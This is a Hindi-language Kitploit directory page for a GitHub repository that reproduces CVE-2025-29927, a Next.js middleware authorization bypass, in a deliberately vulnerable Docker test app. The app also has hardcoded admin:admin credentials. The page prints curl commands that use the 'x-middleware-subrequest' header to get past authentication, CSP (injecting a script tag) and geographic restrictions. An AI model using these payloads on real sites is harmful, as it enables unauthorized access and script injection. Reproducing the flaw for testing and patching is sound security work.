Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
next.js_cve-2025-29927 — Next.js 14.2.24 में CVE-2025-29927 मिडलवेयर प्राधिकरण बाईपास को पुन: उत्पन्न करता है और प्रमाणीकरण और मिडलवेयर प्रतिबंधों को बायपास करने के लिए curl के साथ शोषण प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/0xpthree/next.js_cve-2025-29927
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणआईडीएस/आईपीएस से बचनावेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंग
GitHub0xpthree/next.js_cve-2025-29927

next.js_cve-2025-29927

Next.js 14.2.24 में CVE-2025-29927 मिडलवेयर प्राधिकरण बाईपास को पुन: उत्पन्न करता है और प्रमाणीकरण और मिडलवेयर प्रतिबंधों को बायपास करने के लिए curl के साथ शोषण प्रदर्शित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
41 साल पहलेअभी तक समीक्षित नहीं

next.js_cve-2025-29927

एक छोटा और सरल Next.js एप्लिकेशन जो संस्करण 14.2.24 पर चल रहा है, CVE-2025-29927 का परीक्षण करने के लिए उपयोग किया जाता है।

भेद्यता या हार्डकोडेड क्रेडेंशियल admin:admin का उपयोग करके एडमिन क्षेत्र (/admin) तक पहुँचें।

root@kitploit:~
» git clone [email protected]:0xPThree/next.js_cve-2025-29927.git
» docker build -t nextjs .
» docker run -d -p 3000:3000 --name nextjs nextjs

स्पष्ट प्रमाणीकरण बाईपास के अलावा, यह भेद्यता निम्नलिखित भी कर सकती है:

root@kitploit:~
# Middleware may be used to set CSP headers to prevent XSS. Bypass CSP to XSS:
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
-H "Content-Type: text/html" --data "<script>alert('1')</script>" \
http://exploit.se

# Middleware may be used to restrict content by geographic location. Bypass geographic restrictions:
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
-H "CF-IPCountry: SE" http://exploit.se/se-only-content

image

टूल डाउनलोड करें